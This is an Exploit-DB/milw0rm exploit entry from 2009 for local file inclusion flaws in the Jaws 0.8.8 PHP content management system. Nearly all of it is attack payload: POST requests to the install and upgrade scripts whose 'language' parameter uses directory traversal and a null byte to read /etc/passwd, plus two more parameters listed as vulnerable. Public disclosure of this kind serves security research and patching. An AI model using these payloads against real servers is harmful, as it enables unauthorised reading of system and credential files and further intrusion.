Jaws 0.8.8 - Multiple Local File Inclusions

EDB-ID:

7976

Author:

fuzion

Type:

webapps

Platform:

PHP

Published:

2009-02-04

Jaws 0.8.8 Local File Inclusion

POST /upgrade/index.php
language=../../../../../../../../../../../../etc/passwd%00

POST /install/index.php
language=../../../../../../../../../../../../etc/passwd%00
Also vulnerable:
Introduction_complete
use_log

Author notified: Jan 24

# milw0rm.com [2009-02-04]